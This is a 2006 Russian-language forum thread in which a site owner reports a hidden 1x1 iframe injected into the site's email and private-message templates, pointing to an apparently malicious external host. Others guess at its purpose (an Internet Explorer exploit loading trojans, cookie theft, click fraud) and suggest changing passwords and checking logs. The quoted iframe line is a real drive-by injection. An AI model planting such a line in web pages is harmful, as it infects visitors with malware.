Пытались хакнуть

Discussion in 'Уязвимости' started by CraZy I izzi, 3 Aug 2006.

  1. CraZy I izzi

    CraZy I izzi New Member

    Joined:
    28 Jul 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Здрасти) у меня на сайте была обнаружена вот такая строчка

    Code:
    <iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>
    вставлена она была в формы с текстом отсылаемые юзерам при новом ПМ или о письме с \"Обратной связи\" ...

    Какие последствия могут быть? И чего мог добиться хакер?

    Спасибо)
     
  2. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    знакомая строчка.
    такая приписывалась с слоите RST помоему..для IPB 2.1.6..

    CraZy I izzi, последствия мы можем только гадать. Скорее всего кража кукисов..
     
  3. CraZy I izzi

    CraZy I izzi New Member

    Joined:
    28 Jul 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    мдя)) не повезло мне))

    что посоветуете делать? чтоб такого больше не произашло?
     
  4. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    я конечно не специалист, но я не смог бы с помощью фрейма без явы спереть куки, а вот троянчик закачать через сплойт к ослу вполне возможно
     
    1 person likes this.
  5. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    нда, макс дело говорит...

    что делать? Ну наверно сменить пароль на всякий пожарный. И забанить по Ip чела -)
     
  6. CraZy I izzi

    CraZy I izzi New Member

    Joined:
    28 Jul 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    эти меры уже приняты ..

    может ещё что посаветуете? или где можно почитать инфу об этом?
     
  7. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    https://forum.antichat.ru/showpost.php?p=175930&postcount=3
    гм.. разные adv, но смысл тот же..
    Молодец, правильно все делаешь.
     
  8. genom--

    genom-- Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    668
    Likes Received:
    416
    Reputations:
    288
    ищи дырку както уж он вставил это---- а насчет последствий мож просто клики на вас зарабатывал =)
     
  9. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Очень похоже на ссылку, которая ставится для юзания дыр ИЕ и установки тул-бара дополнительного, спайвэа и тд.... ИМХО, это она и есть...

    Надо порсто весь сайт выкачивать, потом полазить по файлам и найти все пароли. Все настоящие хакеры так делают!!! ;)
     
  10. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    dinar_007, прекрати флеймить..

    ребят, вы хоть видели, что там даже сайта нет?

    "Fedora Core Test Page"

    Побоялись зайти?)
     
  11. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    гыгы... это я к тому, что геном предложил скачать пхп файл... ;)))
    А как качалки работают я знаю... сам телепортом давно еще выкачивал всякое разное...
     
  12. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Данный iframe на Сплоит где идёт подгрузка софта!
     
  13. CraZy I izzi

    CraZy I izzi New Member

    Joined:
    28 Jul 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Мда .. но фишка в том что этот код был вписан в Админке в \"Формы для отправки писем с сайта\" ... движок ДЛЕ ... на сколько я знаю эти формы хранятся в базе ... и по-этому могу предположить что было проникновение в админку .... может я и не прав ... но всё же
     
  14. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Не юзал движок ДЛЕ. но если логически подумать..как сообщение могло оказаться в админке.. если никто туда не проникал? ы?
    Скорее всего сделали рассылку с данной ссылкой..чтобы протроянить юзеров, зареганных на сайте. как вариант.. имхо. Судя из твоих слов.
     
  15. CraZy I izzi

    CraZy I izzi New Member

    Joined:
    28 Jul 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    а я не исключаю возможности проникновения в админку ..

    был у меня случай .. форум Ipb взломали у меня .. мож тогда и было проникновение через форум в ДЛЕ ... но на сколько знаю ДЛЕ сам не сильно дырявый .. хотя .. дыры есть везде ИМХО
     
  16. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    спроси логи у хостера за тот день когда взлом был.
     
  17. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    ослинный сплоит :)

    Redirection Status
    The URL was redirected to . Please click the link to go there.

    You can enable the automatic redirection in the settings.

    Generated by Opera ©